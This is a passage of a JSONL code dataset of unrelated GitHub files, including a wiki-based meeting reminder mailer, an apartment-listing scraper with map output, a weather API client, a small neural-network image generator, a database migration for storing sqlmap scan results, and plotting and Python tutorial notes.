argv[1]\n\nDEBUG = environ.get(\"DEBUG\", \"0\") == \"1\"\nDAYS = int(environ.get(\"DELTA_DAYS\", 1))\n\ntomorrow = date.today() + timedelta(days=DAYS)\n\n\ndef find_between(s, first, last):\n try:\n start = s.index(first) + len(first)\n end = s.index(last, start)\n return s[start:end]\n except ValueError:\n return\n\n\nsetlocale(LC_ALL, \"de_DE.UTF-8\")\nwiki = get(URL).content.decode(\"utf-8\")\n\nplenum_tops = None\nfor date_format in (\"%Y-%m-%d\", \"%d.%m.%Y\"):\n start = \"{} ===\".format(tomorrow.strftime(date_format))\n plenum_tops = find_between(wiki, start, \"=== \")\n\n if plenum_tops:\n break\nelse:\n # Catch a corner case for the first plenum on a page\n plenum_tops = find_between(wiki, start, \"\")\n\nif plenum_tops:\n template = \"\"\"Hallo,\nmorgen ist (laut Wiki) wieder mal Plenum. Nachfolgend die Tagesordnungs-\npunkte aus dem Wiki:\n\n{}\"\"\".format(\n plenum_tops.strip()\n )\n\n if DEBUG:\n print(template)\n exit(0)\n\n msg = MIMEText(template)\n msg[\"Subject\"] = \"Plenum am %s\" % tomorrow.strftime(\"%A, %d.%m.%Y\")\n msg[\"From\"] = argv[2]\n msg[\"To\"] = argv[3]\n\n smtpObj = SMTP(\"localhost\")\n smtpObj.send_message(msg)\n smtpObj.quit()\nelif DEBUG:\n print(wiki)\n exit(1)\n","repo_name":"entropia/reminders","sub_path":"plenum.py","file_name":"plenum.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2446053971","text":"from decouple import config\nfrom ipyleaflet import AwesomeIcon, Map, Marker\nfrom ipywidgets import HTML\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom time import sleep\nimport bs4\nimport datetime\nimport folium\nimport googlemaps\nimport ipyleaflet\nimport numpy as np\nimport pandas as pd\nimport re\n\n\ndef find_clean_entry(link, entry):\n string_value = link.find_all(attrs={entry})\n if string_value:\n string_value = string_value[0].text\n string_value = string_value.replace(\"\\n\", \"\")\n string_value = re.sub(\"\\\\s+\", \" \", string_value)\n string_value = re.sub(\"\\\\s+$|^\\\\s+\", \"\", string_value)\n return string_value\n else:\n return None\n\n\ndef apartment_parser(link):\n ap = {\n \"endereco\": find_clean_entry(link, \"property-card__address\"),\n \"aluguel\": find_clean_entry(link, \"property-card__price\"),\n \"cond\": find_clean_entry(link, \"js-condo-price\"),\n \"vagas\": find_clean_entry(link, \"property-card__detail-garage\"),\n \"banheiros\": find_clean_entry(link, \"property-card__detail-bathroom\"),\n \"quartos\": find_clean_entry(link, \"property-card__detail-room\"),\n \"area\": find_clean_entry(link, \"property-card__detail-area\"),\n \"amenidades\": \", \".join(\n [i.text for i in link.find_all(attrs={\"amenities__item\"})]\n ),\n \"link\": (\n \"https://www.vivareal.com.br\"\n + link.find_all(attrs={\"js-listing-labels-link\"})[0].get(\"href\")\n ),\n }\n return ap\n\n\ndef get_results(bairro, filtro):\n main_site = \"https://www.vivareal.com.br/aluguel/sp/campinas/\"\n button_next_page = '//button[@class=\"js-change-page\" and @title=\"Próxima página\"]'\n url = main_site + bairro + \"/\" + filtro\n browser = webdriver.Firefox()\n browser.get(url)\n sleep(3)\n aps_list = []\n next_page = False\n count = 1\n # extra timer for page to load\n sleep(1)\n while not next_page:\n print(\"Scrapping page: \" + str(count))\n # next_page = re.sub(\"#\", \"?\", 
next_page)\n # url = main_site + bairro + \"/\" + next_page + filtro\n # print(url)\n # browser.get(url)\n # browser.find_element(By.XPATH, button_next_page).click()\n # find button for next page to be loaded\n # extra timer for page to load\n sleep(2)\n # browser.find_element(By.XPATH, button_next_page).click()\n # element.click()\n # scrap housing info\n html = browser.page_source\n soup = bs4.BeautifulSoup(html, \"html.parser\")\n links = soup.find_all(attrs={\"property-card__container\"})\n for entry in links:\n aps_list.append(apartment_parser(entry))\n # check next page\n paginas = soup.find_all(attrs={\"pagination__item\"})\n next_page = paginas[-1].find(\"button\").has_attr(\"data-disabled\")\n # click on next page\n element = WebDriverWait(browser, 20).until(\n EC.element_to_be_clickable((By.XPATH, button_next_page))\n )\n browser.execute_script(\"arguments[0].click();\", element)\n count = count + 1\n browser.close()\n return aps_list\n\n\ndef randomize_location(x, coord):\n conditions = [\n ((x.entries_by_cluster > 1) & (x.entries_by_cluster < 5)),\n (x.entries_by_cluster > 5),\n (x.entries_by_cluster == 1),\n ]\n choices = [\n x[coord] + np.random.normal(0, 0.0001, x.shape[0]),\n x[coord] + np.random.normal(0, 0.0005, x.shape[0]),\n x[coord],\n ]\n return np.select(conditions, choices)\n\n\ndef addApartment(map_, a):\n popup = folium.Popup(a._popup_(), max_width=450)\n folium.Marker(\n location=[a.lat, a.lon],\n popup=popup,\n # I can use fontawesome to change the pin icon\n icon=folium.Icon(color=\"green\", prefix=\"fa\"),\n ).add_to(map_)\n\n\nclass Apartment:\n def __init__(self, **kwargs):\n self.endereco = kwargs.get(\"endereco\")\n self.aluguel = kwargs.get(\"aluguel\")\n self.cond = kwargs.get(\"cond\")\n self.vagas = kwargs.get(\"vagas\")\n self.banheiros = kwargs.get(\"banheiros\")\n self.quartos = kwargs.get(\"quartos\")\n self.area = kwargs.get(\"area\")\n self.amenidades = kwargs.get(\"amenidades\")\n self.link = kwargs.get(\"link\")\n self.id_address = kwargs.get(\"id\")\n self.lat = kwargs.get(\"lat\")\n self.lon = kwargs.get(\"lon\")\n self.cluster = kwargs.get(\"cluster\")\n\n def _popup_(self):\n return f\"\"\"\n

<b>Info</b><br>\n Endereco: {self.endereco}<br>\n Aluguel: {self.aluguel}<br>\n Cond: {self.cond}<br>\n Vagas: {self.vagas}<br>\n Banheiros: {self.banheiros}<br>\n Quartos: {self.quartos}<br>\n Area: {self.area}<br>\n Amenidades: {self.amenidades}<br>\n Id_address: {self.id_address}<br>\n Lat: {self.lat}<br>\n Lon: {self.lon}<br>\n <a href=\"{self.link}\" target=\"_blank\">Link</a>
\n \"\"\"\n\n\ndef create_map(apartments, filename):\n cps_coords = [-22.8923728, -47.2079813]\n map_ = folium.Map(location=cps_coords, zoom_start=10)\n\n interesting_coords = [-22.914183, -47.063295]\n\n # add central marker\n marker1 = folium.Marker(\n location=interesting_coords,\n popup=\"Point of interest\",\n # don't use single quotes, only double quotes\n icon=folium.Icon(name=\"circle\", color=\"red\", icon_color=\"black\"),\n )\n marker1.add_to(map_)\n\n # add circles at central point\n folium.Circle(\n location=interesting_coords, radius=5000, color=\"green\", opacity=0.5, weight=2\n ).add_to(map_)\n folium.Circle(\n location=interesting_coords, radius=10000, color=\"yellow\", opacity=0.5, weight=2\n ).add_to(map_)\n folium.Circle(\n location=interesting_coords, radius=15000, color=\"orange\", opacity=0.5, weight=2\n ).add_to(map_)\n folium.Circle(\n location=interesting_coords, radius=20000, color=\"red\", opacity=0.5, weight=2\n ).add_to(map_)\n\n # add apartments\n for entry in apartments:\n addApartment(map_, entry)\n\n # save map\n map_.save(filename)\n\n\ndef create_map_ipyleaflet(apartments):\n cps_coords = [-22.8923728, -47.2079813]\n map_ = Map(center=cps_coords)\n\n interesting_coords = [-22.9174636, -47.0597494]\n\n # add central marker\n marker1 = Marker(\n location=interesting_coords,\n popup=HTML(value=\"Point of interest\"),\n # don't use single quotes, only double quotes\n icon=AwesomeIcon(name=\"circle\", marker_color=\"red\", icon_color=\"black\"),\n )\n map_.add_layer(marker1)\n\n # add circles at central point\n ipyleaflet.Circle(\n location=interesting_coords, radius=5000, color=\"green\", opacity=0.5, weight=2\n ).add_to(map_)\n ipyleaflet.Circle(\n location=interesting_coords, radius=10000, color=\"yellow\", opacity=0.5, weight=2\n ).add_to(map_)\n ipyleaflet.Circle(\n location=interesting_coords, radius=15000, color=\"orange\", opacity=0.5, weight=2\n ).add_to(map_)\n ipyleaflet.Circle(\n location=interesting_coords, radius=20000, color=\"red\", opacity=0.5, weight=2\n ).add_to(map_)\n\n # add apartments\n for entry in apartments:\n addApartment(map_, entry)\n\n # save map\n map_.save(\"map.html\")\n\n\ndef scrape_properties(bairro, filtro, engine):\n new_property = get_results(bairro, filtro)\n new_property = pd.DataFrame(new_property)\n new_property = new_property.sort_values(by=[\"endereco\"], axis=0)\n\n # filter results already in the db\n with engine.connect() as conn:\n apartment_links = pd.read_sql(\n \"select link, endereco, lat, lon from apartments\", conn\n )\n type(apartment_links)\n len(apartment_links)\n\n key = new_property.link.isin(apartment_links.link)\n new_property = new_property.loc[~key, :]\n\n # add lat/lon of known addresses\n unique_adresses = apartment_links.loc[\n :, [\"endereco\", \"lat\", \"lon\"]\n ].drop_duplicates()\n new_property = pd.merge(new_property, unique_adresses, how=\"left\", on=\"endereco\")\n # checks\n print(new_property.shape)\n print(new_property.info())\n\n # Address\n # Geocoding an address\n key = new_property.lat.isna()\n search_addresses = new_property.loc[key, [\"endereco\"]].drop_duplicates()\n\n # checks\n print(\"Address shape: \")\n print(search_addresses.shape)\n print(\"How many addresses are already on the database: \")\n print(search_addresses.endereco.isin(apartment_links.endereco).describe())\n\n # Uses google geocoding API\n gmaps = googlemaps.Client(key=config(\"google_key\"))\n\n geocode_entries = {}\n dt_geocode = []\n for i, entry in search_addresses.iterrows():\n print(\"Buscando 
endereco: {}\".format(i))\n endereco = entry[\"endereco\"]\n geocode_result = gmaps.geocode(endereco)\n geocode_entries[i] = {\"query\": endereco, \"result\": geocode_result}\n dt_geocode.append(\n {\n \"endereco\": endereco,\n \"lat\": geocode_result[0].get(\"geometry\").get(\"location\").get(\"lat\"),\n \"lon\": geocode_result[0].get(\"geometry\").get(\"location\").get(\"lng\"),\n }\n )\n sleep(0.05)\n\n dt_geocode = pd.DataFrame(dt_geocode)\n # checks\n print(\"Google Maps geocoding info: \")\n print(dt_geocode.info())\n\n new_property = (\n pd.merge(new_property, dt_geocode, how=\"left\", on=[\"endereco\"])\n .assign(\n lat_x=lambda x: x.lat_x.fillna(x[\"lat_y\"]),\n lon_x=lambda x: x.lon_x.fillna(x[\"lon_y\"]),\n )\n .rename(columns={\"lat_x\": \"lat\", \"lon_x\": \"lon\"})\n .drop([\"lat_y\", \"lon_y\"], axis=1)\n )\n\n # add datetime and status\n new_property = new_property.assign(date=datetime.datetime.now(), status=\"new\")\n print(\"Final dataset head: \")\n new_property.head()\n print(\"Final dataset info: \")\n new_property.info()\n\n # change all previous status to old\n print(\"Updating dataset...\")\n engine.connect().execute(\"UPDATE apartments SET status = 'old';\")\n\n # Save results on sqlite db\n print(\"Saving new results...\")\n with engine.connect() as conn:\n new_property.to_sql(\"apartments\", conn, if_exists=\"append\", index=False)\n\n\ndef gen_map(engine, filename):\n # get results from sqlite db\n with engine.connect() as conn:\n apartments = pd.read_sql(\"select * from apartments where status ='new'\", conn)\n\n # apartments = temp\n apartments = apartments.assign(\n cluster=lambda x: x.groupby(\"endereco\").ngroup(),\n entries_by_cluster=lambda x: x.loc[:, [\"status\", \"endereco\"]]\n .groupby(\"endereco\")\n .transform(\"count\"),\n lat=lambda x: randomize_location(x, \"lat\"),\n lon=lambda x: randomize_location(x, \"lon\"),\n preco_tot=lambda x: (\n (\n x.aluguel.str.replace(\"[^0-9]\", \"\")\n .replace(\"\", \"0\")\n .replace(np.nan, \"0\")\n .astype(\"float64\")\n )\n + (\n x.cond.str.replace(\"[^0-9]\", \"\")\n .replace(\"\", \"0\")\n .replace(np.nan, \"0\")\n .astype(\"float64\")\n )\n ),\n )\n print(\"Map dataset shape: \")\n apartments.shape\n print(\"Map dataset info: \")\n apartments.info()\n\n apartments = [Apartment(**entry.to_dict()) for _, entry in apartments.iterrows()]\n\n # Map\n create_map(apartments, filename)\n","repo_name":"nettoyoussef/find_apartment","sub_path":"src/find_apartment.py","file_name":"find_apartment.py","file_ext":"py","file_size_in_byte":11667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74295136871","text":"import requests\r\nimport json\r\n\r\ndef get_weather(city):\r\n # Enter your OpenWeatherMap API key here\r\n api_key = \"YOUR_API_KEY\"\r\n\r\n # API endpoint URL\r\n url = f\"http://api.openweathermap.org/data/2.5/weather?q={city}&appid={api_key}\"\r\n\r\n try:\r\n # Send a GET request to the API\r\n response = requests.get(url)\r\n\r\n # Parse the JSON data from the response\r\n data = json.loads(response.text)\r\n\r\n # Extract relevant weather information\r\n weather = {\r\n \"city\": data[\"name\"],\r\n \"temperature\": data[\"main\"][\"temp\"],\r\n \"description\": data[\"weather\"][0][\"description\"],\r\n \"humidity\": data[\"main\"][\"humidity\"],\r\n \"wind_speed\": data[\"wind\"][\"speed\"]\r\n }\r\n\r\n # Return the weather information\r\n return weather\r\n except requests.exceptions.RequestException as e:\r\n # Handle any request 
errors\r\n print(\"Error:\", e)\r\n return None\r\n\r\n# Example usage\r\ncity = input(\"Enter city name: \")\r\nweather_info = get_weather(city)\r\n\r\nif weather_info:\r\n print(\"\\nWeather Information for\", weather_info[\"city\"])\r\n print(\"Temperature:\", weather_info[\"temperature\"], \"K\")\r\n print(\"Description:\", weather_info[\"description\"])\r\n print(\"Humidity:\", weather_info[\"humidity\"], \"%\")\r\n print(\"Wind Speed:\", weather_info[\"wind_speed\"], \"m/s\")","repo_name":"sohalsingh/weatherfinder","sub_path":"weatherfinder.py","file_name":"weatherfinder.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32009651524","text":"import time\nimport numpy as np\nimport h5py\nimport matplotlib.pylab as plt\nimport scipy\nfrom PIL import Image\nfrom scipy import ndimage\n#from NeuralNetwork.DeepNeuralNetwork.dnn_app_utils_v2 import *\n\nfrom NeuralNetwork.DeepNeuralNetwork.DNNmodel import *\nfrom NeuralNetwork.DeepNeuralNetwork.dnn_app_utils_v2 import sigmoid, sigmoid_backward, relu, relu_backward, load_data, predict, print_mislabeled_images\n\nplt.rcParams['figure.figsize'] = (5.0, 4.0) # set default size of plots\nplt.rcParams['image.interpolation'] = 'nearest'\nplt.rcParams['image.cmap'] = 'gray'\n\nnp.random.seed(1)\n\ntrain_x_orig, train_y, test_x_orig, test_y, classes = load_data()\n\nm_train = train_x_orig.shape[0] # the number of examples\nnum_px = train_x_orig.shape[1] # the number of px\nm_test = test_x_orig.shape[0] # the number of test examples\n\ntrain_x_flatten = train_x_orig.reshape(train_x_orig.shape[0], -1).T\ntest_x_flatten = test_x_orig.reshape(test_x_orig.shape[0], -1).T\n\ntrain_x = train_x_flatten / 255\ntest_x = test_x_flatten / 255\n\ndef L_layer_model(X, Y, layers_dims, learning_rate = 0.0075, num_iterations = 3000, print_cost = False):\n \"\"\"\n Arguments:\n X -- data, numpy array of shape (number of examples, num_px * num_px * 3)\n Y -- true \"label\" vector (containing 0 if cat, 1 if non-cat), of shape (1, number of examples)\n layers_dims -- list containing the input size and each layer size, of length (number of layers + 1).\n learning_rate -- learning rate of the gradient descent update rule\n num_iterations -- number of iterations of the optimization loop\n print_cost -- if True, it prints the cost every 100 steps\n\n Returns:\n parameters -- parameters learnt by the model. 
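These are the weight matrices and bias vectors of each layer. 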
They can then be used to predict.\n \"\"\"\n\n np.random.seed(1)\n costs = []\n # 1 initialize\n parameters = initialize_parameters_deep(layers_dims)\n L = len(layers_dims) - 1\n AL = \"A\" + np.str(L)\n # 2 loop\n for i in range(num_iterations):\n # a forward propagation\n AL, caches = L_model_forward(X, parameters)\n\n # b cost\n cost = compute_cost(AL, Y)\n\n # c backward propagation\n grads = L_model_backward(AL, Y, caches)\n\n # d update\n parameters = update_parameters(parameters, grads, learning_rate)\n\n if i % 100 == 0:\n costs.append(cost)\n if print_cost:\n print(\"cost after %i iterations is: %f\" % (i, cost))\n '''\n plt.plot(np.squeeze(costs))\n plt.ylabel('cost')\n plt.xlabel('iterations (per tens)')\n plt.title(\"Learning rate =\" + str(learning_rate))\n plt.show()\n '''\n return parameters\n\nlayers_dims = [12288, 20, 7, 5, 1]\nparameters = L_layer_model(train_x, train_y, layers_dims, num_iterations = 2500, print_cost = True)\n\ndef cat_generization(parameter, iteration_num = 20000, target = 1, learning_rate = 500):\n #cat = np.zeros(shape=(12288, 1)) * 255\n cat = np.random.randint(low=0, high=255, size=(12288, 1))\n for i in range(iteration_num):\n cat = np.clip(cat, 0.0, 255.0)\n AL, caches = L_model_forward(cat / 255.0, parameter)\n cost = -1.0 / 1 * np.sum(np.multiply(target, np.log(AL)) + np.multiply(1 - target, np.log(1 - AL)))\n grads = L_model_backward(AL, target, caches)\n cat_grads = grads[\"dA_prev\"]\n cat -= learning_rate * cat_grads\n if i % 1000 == 0:\n print(cost)\n return cat\n\n\ncat = cat_generization(parameters) / 255.0\ncat = np.clip(cat, 0.0, 1.0)\nprob, caches = L_model_forward(cat, parameters)\nmy_predicted_image = predict(cat, 1, parameters)\nad_image = cat.reshape(64, 64, 3)\nprint(prob)\n#plt.imshow(image)\nplt.imshow(ad_image)\n\nplt.show()\nprint (\"y = \" + str(np.squeeze(my_predicted_image)) + \", your L-layer model predicts a \\\"\" + classes[int(np.squeeze(my_predicted_image)),].decode(\"utf-8\") + \"\\\" picture.\")\n","repo_name":"vandeppce/DeepLearning","sub_path":"NeuralNetwork/DeepNeuralNetwork/GenerateCat.py","file_name":"GenerateCat.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21586732831","text":"\"\"\"Subscribe to events\"\"\"\n\nfrom selenium.webdriver.common.by import By\n\nfrom .common import printdebug\n\n\ndef subscribe_to_events(config, driver, debug):\n \"\"\"Subscribe to events\"\"\"\n if debug:\n printdebug('subscribing to events')\n events = config['github_app']['subscribe_to_events']\n\n for event, subscribe in events.items():\n handle_subscription(event, subscribe, driver, debug)\n\n\ndef handle_subscription(event, subscribe, driver, debug):\n \"\"\"Handle subscription to event\"\"\"\n if subscribe:\n if debug:\n printdebug(f\"subscribing to: '{event}'\")\n printdebug('finding event checkbox')\n xpath = f\"//input[@type='checkbox' and @value='{event}']\"\n checkbox = driver.find_element(By.XPATH, xpath)\n if not checkbox.is_selected():\n if debug:\n printdebug('event checkbox is NOT already checked')\n printdebug('clicking on event checkbox')\n checkbox.click()\n else:\n if debug:\n printdebug('event checkbox IS already checked')\n printdebug('doing nothing')\n else:\n printdebug(f\"NOT subscribing to: 
'{event}'\")\n","repo_name":"mokshadharma/the-animal","sub_path":"lib/subscribe_to_events.py","file_name":"subscribe_to_events.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"24660576813","text":"\"\"\"add sqlmap\n\nRevision ID: b4d50f3f1bcf\nRevises: bba37bac95b0\nCreate Date: 2021-03-15 14:37:16.465349\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'b4d50f3f1bcf'\ndown_revision = 'bba37bac95b0'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n\top.create_table('sqlmap',\n\t\tsa.Column('path_id', sa.Integer(), nullable=False),\n\t\tsa.Column('clean', sa.Boolean(), server_default=sa.text('false'), nullable=False),\n\t\tsa.Column('output', postgresql.JSONB(astext_type=sa.Text()), nullable=True),\n\t\tsa.Column('updated_dttm', postgresql.TIMESTAMP(), server_default=sa.text('to_timestamp(0)'), nullable=False),\n\t\tsa.ForeignKeyConstraint(['path_id'], ['path.path_id'], ondelete=\"CASCADE\" ),\n\t\tsa.PrimaryKeyConstraint('path_id'),\n\t\tschema='scans'\n\t)\n\top.create_index(op.f('ix_scans_sqlmap_updated_dttm'), 'sqlmap', ['updated_dttm'], unique=False, schema='scans')\n\top.alter_column(\n\t\ttable_name=\"path\",\n\t\tcolumn_name=\"vars\",\n\t\ttype_=postgresql.JSONB\n\t)\n\n\ndef downgrade():\n\top.alter_column(\n\t\ttable_name=\"path\",\n\t\tcolumn_name=\"vars\",\n\t\ttype_=postgresql.JSON\n\t)\n\top.drop_index(op.f('ix_scans_sqlmap_updated_dttm'), table_name='sqlmap', schema='scans')\n\top.drop_table('sqlmap', schema='scans')\n\n","repo_name":"IMEsec-USP/VuMoS","sub_path":"src/alembic/alembic/versions/20210315143716_b4d50f3f1bcf_add_sqlmap.py","file_name":"20210315143716_b4d50f3f1bcf_add_sqlmap.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39578972675","text":"'''\r\n1. 축약함수(lambda)\r\n - 한 줄 함수\r\n 형식) 변수 = lambda 인수 : 리턴값\r\n ex) lambda x,y : x+y\r\n\r\n2. scope\r\n - 전역변수, 지역변수(함수)\r\n\r\n'''\r\n\r\n# 1. 축약함수\r\ndef adder(x,y) :\r\n add = x+y\r\n return add\r\n# lambda 함수를 사용해서 위함수를 한줄로 표현가능\r\nadd = lambda x,y : x+y\r\n # 리스트 내포에 활용 : [lambda x,y : x+y for 변수 in 열거형객체]\r\nre = add(3,2)\r\nprint(re) # 5\r\n\r\n\r\n# 2. 
scope\r\n''' 전역변수 : 전지역에서 사용되는 변수\r\n 지역변수 : 특정 지역(함수) 안에서만 사용되는 변수 '''\r\nx = 50\r\n\r\n# 지역변수\r\ndef local_func(x) :\r\n x # 지역변수\r\n x += 50 # x = 100 : 지역변수 < 값이 나오지않는다.>\r\n # 해당 함수가 종료되면 자동으로 소멸\r\nlocal_func(x) # x = 50\r\nprint('x =', x) # x = 50\r\n\r\n# 전역변수\r\ndef global_func() :\r\n global x # 전역변수\r\n x += 50 # x = 100 : 전역변수 <값이 나온다>\r\nglobal_func() # x = 100\r\nprint('x =', x) # x = 100\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"yangmyongho/3_Python","sub_path":"chap05_Function_lecture/step04_lambda_scope.py","file_name":"step04_lambda_scope.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25542530980","text":"\n# coding: utf-8\n\n# # Matplotlib——高级图\n# \n# 图是用来更好的解释数据\n# \n# 目标:让老板或客户印象深刻,一目了然\n# \n# 1. 饼状图\n# 2. 柱状图\n# 3. 散点图\n# 4. 概率图\n# 5. 组合图\n# 6. 三维数据图\n# 7. 美化\n\n# In[1]:\n\n#get_ipython().magic(u'matplotlib inline')\n\n\n# ## 1. 饼状图\n\n# In[61]:\n\nimport matplotlib.pyplot as plt\n\nplt.figure(figsize=(9,6))\n\n# The slices will be ordered and plotted counter-clockwise.\nlabels = [u'直接访问', u'外部链接', u'搜索引擎']\nsizes = [160, 130, 110]\ncolors = ['yellowgreen', 'gold', 'lightskyblue']\n\n#explode 爆炸出来,每个饼图块之间的\nexplode = (0.05, 0.0, 0.0) \n\npatches, l_texts, p_texts = plt.pie(sizes, explode=explode, labels=labels, colors=colors, labeldistance=0.8,\n autopct='%3.1f%%', shadow=False, startangle=90, pctdistance=0.6)\n\n# 设置x,y轴刻度一致,这样饼图才能是圆的\nplt.axis('equal')\n#plt.legend()\n\n \nfor t in l_texts:\n t.set_size(20)\n\nfor t in p_texts:\n t.set_size(20)\n \nplt.show()\n\n\n# ## 2. 柱状图\n\n# In[70]:\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nplt.figure(figsize=(9,6))\n\nn = 12\nX = np.arange(n)+1\n# numpy.random.uniform(low=0.0, high=1.0, size=None), normal\nY1 = (1-X/float(n+1)) * np.random.uniform(0.5,1.0,n)\nY2 = (1-X/float(n+1)) * np.random.uniform(0.5,1.0,n)\n\n# bar and barh\nwidth = 0.5\nplt.bar(X, Y1, width=width, facecolor='#9999ff', edgecolor='white')\n#plt.bar(X, -Y2, width=width, facecolor='#ff9999', edgecolor='white')\n\n\"\"\"\nfor x,y in zip(X,Y1):\n plt.text(x+0.4, y+0.05, '%.2f' % y, ha='center', va= 'bottom')\n \nfor x,y in zip(X,-Y2):\n plt.text(x+0.4, y-0.15, '%.2f' % y, ha='center', va= 'bottom')\n\"\"\"\n\n#plt.ylim(-1.25,+1.25)\nplt.show()\n\n\n# ## 3. 散点图\n\n# In[74]:\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\nplt.figure(figsize=(9,6))\n\nn = 1024\n\n# rand 和 randn\nX = np.random.randn(1,n)\nY = np.random.randn(1,n)\n\nT = np.arctan2(Y,X)\n\nplt.scatter(X,Y, s=75, c=T, alpha=.4, marker='o')\n\n#plt.xlim(-1.5,1.5), plt.xticks([])\n#plt.ylim(-1.5,1.5), plt.yticks([])\n\nplt.show()\n\n\n# ## 4. 
概率分布\n\n# In[79]:\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\nmu = 0\nsigma = 1\nx = mu + sigma*np.random.randn(10000)\n\nfig,(ax0,ax1)=plt.subplots(ncols=2, figsize=(9,6))\n\nax0.hist(x, 20, normed=1, histtype='bar', facecolor='g', alpha=0.75)\nax0.set_title('pdf')\n\nax1.hist(x, 20, normed=1, histtype='bar', rwidth=0.8, cumulative=True)\nax1.set_title('cdf')\n\nplt.show()\n\n\n# ## 5.组合图\n\n# In[81]:\n\n# ref : http://matplotlib.org/examples/pylab_examples/scatter_hist.html\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# the random data\nx = np.random.randn(1000)\ny = np.random.randn(1000)\n\n# 定义子图区域\nleft, width = 0.1, 0.65\nbottom, height = 0.1, 0.65\nbottom_h = left_h = left + width + 0.02\n\nrect_scatter = [left, bottom, width, height]\nrect_histx = [left, bottom_h, width, 0.2]\nrect_histy = [left_h, bottom, 0.2, height]\n\nplt.figure(1, figsize=(6, 6))\n\n# 根据子图区域来生成子图\naxScatter = plt.axes(rect_scatter)\naxHistx = plt.axes(rect_histx)\naxHisty = plt.axes(rect_histy)\n\n# no labels\n#axHistx.xaxis.set_ticks([])\n#axHisty.yaxis.set_ticks([])\n\n# now determine nice limits by hand:\nN_bins=20\nxymax = np.max([np.max(np.fabs(x)), np.max(np.fabs(y))])\nbinwidth = xymax/N_bins\nlim = (int(xymax/binwidth) + 1) * binwidth\nnlim = -lim\n\n# 画散点图,概率分布图\naxScatter.scatter(x, y)\naxScatter.set_xlim((nlim, lim))\naxScatter.set_ylim((nlim, lim))\n\nbins = np.arange(nlim, lim + binwidth, binwidth)\naxHistx.hist(x, bins=bins)\naxHisty.hist(y, bins=bins, orientation='horizontal')\n\n# 共享刻度\naxHistx.set_xlim(axScatter.get_xlim())\naxHisty.set_ylim(axScatter.get_ylim())\n\nplt.show()\n\n\n# In[7]:\n\n# ref http://matplotlib.org/examples/showcase/integral_demo.html\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef func(x):\n return (x - 3) * (x - 5) * (x - 7) + 85\n\na, b = 2, 9 # integral limits\nx = np.linspace(0, 10)\ny = func(x)\n\n# 画线\nfig, ax = plt.subplots()\nplt.plot(x, y, 'r', linewidth=2)\nplt.ylim(ymin=0)\n\n# 画阴影区域\nxf = x[np.where((x>a)&(x\n# 订单ID金额方式订单时间\n# \n# 1214693\n# 18\n# 支付宝 / IAP ...\n# 8/31/2015 18:41\n# \n# \n\n# In[ ]:\n\n\n\n","repo_name":"todoit/PythonNote","sub_path":"src/todoit/MatPlot/matplotlib_1.py","file_name":"matplotlib_1.py","file_ext":"py","file_size_in_byte":6199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"4542013018","text":"\"\"\"Template tags for the ``task_list`` app.\"\"\"\nfrom django import template\nfrom django.core.urlresolvers import reverse\n\nregister = template.Library()\n\n\n@register.simple_tag()\ndef get_ctype_url(url_name, ctype_pk=None, obj_pk=None, **kwargs):\n \"\"\"Returns the correct url wheter or not a ctype_pk is given.\"\"\"\n if ctype_pk:\n kwargs.update({'ctype_pk': ctype_pk, 'obj_pk': obj_pk})\n return reverse(url_name, kwargs=kwargs)\n","repo_name":"bitlabstudio/django-task-list","sub_path":"task_list/templatetags/task_list_tags.py","file_name":"task_list_tags.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"39046282648","text":"\r\n# EDIT ON 07/27/23\r\n# To use the Launcher, visit [ip here]/launcher or by clicking the link in the main page.\r\n\r\nimport os\r\nimport subprocess\r\nimport zipfile\r\nfrom nicegui import ui\r\n\r\ncwd = os.getcwd()\r\nos.system('mkdir lnxt')\r\n\r\ndef unpack(targetfile, targetdir):\r\n with zipfile.ZipFile(targetfile) as zf:\r\n try:\r\n zf.extractall(targetdir)\r\n print('[WARN] Unpack 
